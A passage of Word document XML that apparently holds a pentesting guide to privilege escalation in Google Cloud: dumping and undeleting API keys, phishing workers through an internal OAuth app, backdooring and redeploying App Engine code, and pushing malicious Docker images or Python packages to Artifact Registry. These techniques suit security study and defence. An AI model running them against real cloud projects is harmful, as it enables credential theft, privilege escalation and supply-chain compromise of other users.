          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> they are granted Owner role over the new project. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> a user could c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reate a project and an API key inside this project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED170F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apikeys.keys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.getKeyString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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apikeys.keys.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="459A922F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These permissions </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>allows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list and get all the </w:t>
      </w:r>
      <w:proofErr w:type="spell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apiKeys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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and get the Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E6F91A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8EF4718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for  key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in  $(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services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api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-keys list --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uri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); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8725BB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ab/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services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api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-keys get-key-string "$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key"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="11BF51C0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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AFEBEB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find a script to automate the </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia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creation, exploit and cleaning of a vuln environment here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3EFA86EA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lastRenderedPageBreak/>
        <w:t>apikeys.keys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.undelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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apikeys.keys.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C169241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These permissions allow you to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list and regenerate deleted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. The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API key is given in the output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> after the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>undelete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> is done:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F599E2" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E064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11D5DE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services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api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-keys list --show-deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA72E11" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641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services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api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-keys undelete &lt;key-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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9F3E42" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E064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 xml:space="preserve">Create Internal OAuth Application to phish other </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>workers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E24477D" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E064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Check the following page to learn how to do this, although this action belongs to the service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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clientauthconfig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hyperlink r:id="rId86" w:anchor="before-you-begin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according to the docs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48687AE4" w14:textId="60D75442" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="uppercase"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27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GWS - Google Platforms Phishing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77BEB1DC" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="28514184" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="0D357836" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641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 xml:space="preserve">GCP - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>AppEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40AC3E1B" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C266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App Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD76B0D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more information about App Engine check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25329203" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId88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sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>GCP - App Engine Enum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20185116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appengine.applications.get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appengine.instances.get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appengine.instances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.list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appengine.operations.get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appengine.operations.list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appengine.services.get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appengine.services.list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appengine.versions.create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appengine.versions.get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appengine.versions.list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cloudbuild.builds.get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r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iam.serviceAccounts.actAs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resourcemanager.projects.get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storage.objects.create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storage.objects.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FEB8438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Those are the needed permissions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deploy an App using </w:t>
      </w:r>
      <w:proofErr w:type="spell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gcloud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cli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. Maybe the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get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list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> ones could be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avoided</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C4044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find python code examples in </w:t>
      </w:r>
      <w:hyperlink r:id="rId89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https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="477A6E6F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By default, the name of the App service is going to be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default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, and there can be only 1 instance with the same name. To change it and create a second App, in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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app.yaml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, change the value of the root key to something like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service: my-second-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB6A39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6856D4A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cd python-docs-samples/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appengine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/flexible/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hello_world</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6628597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app deploy #Upload and start application inside the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folder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34FC10EE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Give it at least 10-15min, if it doesn't work call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deploy another of times</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and wait some minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45223BE0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It's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possible to indicate the Service Account to use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> but by default, the App Engine default SA is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FC9CE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URL of the application is something like </w:t>
      </w:r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https://&lt;proj-name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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&gt;.oa.r.appspot.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r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https://&lt;service_name&gt;-dot-&lt;proj-name&gt;.oa.r.appspot.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECDBDF9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 xml:space="preserve">Update equivalent </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65FDE700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might have enough permissions to update an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>AppEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> but not to create a new one. In that case this is how you could update the current App Engine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5893DA6B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3B2F1888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Find the code of the App Engine in the buckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CCF532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gsutil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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E7463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87CCD8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Download code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E4591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mkdir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tmp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/appengine2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B1DB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cd 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tmp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/appengine2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F035E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## In this case it was found in this custom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bucket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but you could also use the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31507D6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buckets generated when the App Engine is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E82292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gsutil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cp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gs://appengine-lab-1-gcp-labs-4t04m0i6-3a97003354979ef6/labs_appengine_1_premissions_privesc.zip .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1F833DCB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unzip labs_appengine_1_premissions_privesc.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E646E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539C6B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## Now modify the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code..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1488E49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2B6891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## If you don't have an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app.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, create one like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB50F98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cat &gt;&gt;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app.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3023F97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runtime: python312</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F25E307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B838878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entrypoint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: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gunicorn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 :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\$PORT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main:app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2017201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235CFB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env_variables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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D96E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A_VARIABLE: "value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68425748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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B56AC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7D8E57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Deploy the changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6FB8B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app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deploy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="364CAEA8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6D52E7C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Update the SA if you need it (and if you have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actas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permissions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B652184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app update --service-account=&lt;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sa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&gt;@$PROJECT_ID.iam.gserviceaccount.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C38FF4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have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already compromised a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AppEngine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and you have the permission </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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appengine.applications</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>.update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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actAs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> over the service account to use you could modify the service account used by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>AppEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26767D07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2AA732E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app update --service-account=&lt;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sa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&gt;@$PROJECT_ID.iam.gserviceaccount.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B58E56A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appengine.instances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.enableDebug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appengine.instances.get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appengine.instances.list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appengine.operations.get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appengine.services.get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appengine.services.list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appengine.versions.get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appengine.versions.list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compute.projects.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C660C5E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With these permissions, it's possible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login via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ssh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in App Engine instances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of type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flexible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not standard). Some of the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list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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions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could not be really needed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F54B8B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3A5FBB5C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app instances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ssh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--service &lt;app-name&gt; --version &lt;version-id&gt; &lt;ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3842E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appengine.applications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.update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appengine.operations.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D129553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 think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF78F54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4042853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app update --service-account=&lt;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sa_email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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FDB159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appengine.versions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.getFileContents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appengine.versions.update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="698994C5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 sure how to use these permissions or if they are useful (note that when you change the code a new version is created so I don't know if you can just update the code or the IAM role of one, but I guess you should be able to, maybe changing the code inside the bucket??).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D49EB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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Write Access over the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>buckets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24A99BFB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Even with write access over the buckets where the source code is located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it WASN'T possible to execute arbitrary code by modifying the source code and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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manifest.json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. Maybe if you are monitoring the bucket and detect the moment where a new version is created and the source code and manifest is uploaded, it might be possible to change </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>them</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> so the new version uses the backdoored ones??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1BD55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also looks like container layers are stored in the bucket, maybe changing those?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C59A11B" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="5F74BFC3" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669"/>
    <w:p w14:paraId="3038D4D5" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C266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 xml:space="preserve">GCP - Artifact Registry </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="310EFC2B" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C266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Artifact Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ECC481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more information about Artifact Registry check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B5C42" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId90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sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>GCP - Artifact Registry Enum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="544F302F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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>artifactregistry.repositories</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>.uploadArtifacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CF85D9A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With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BD7AD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2FFDF612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Configure docker to use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to authenticate with Artifact Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD5CB6F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configure-docker &lt;location&gt;-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docker.pkg.dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70EA3252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3995B3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tag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the image to upload it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4C33C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docker tag &lt;local-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-name&gt;:&lt;local-tag&gt; &lt;location&gt;-docker.pkg.dev/&lt;proj-name&gt;/&lt;repo-name&gt;/&lt;img-name&gt;:&lt;tag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A3B7F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9793C7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Upload it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B10BBE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docker push &lt;location&gt;-docker.pkg.dev/&lt;proj-name&gt;/&lt;repo-name&gt;/&lt;img-name&gt;:&lt;tag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C065D1E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was checked that it's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possible to upload a new malicious docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> image with the same name and tag as the one already present, so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old one will lose the tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and next time that image with that tag is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downloaded the malicious one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F4901" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upload a Python </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>library</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00105DA5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lastRenderedPageBreak/>
        <w:t>Start by creating the library to upload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (if you can download the latest version from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>registry</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you can avoid this step):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE531DA" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Set up your project structure</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B62070" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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Create a new directory for your library, e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hello_world_library</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B071836" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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Inside this directory, create another directory with your package name, e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hello_world</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A38A7C0" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
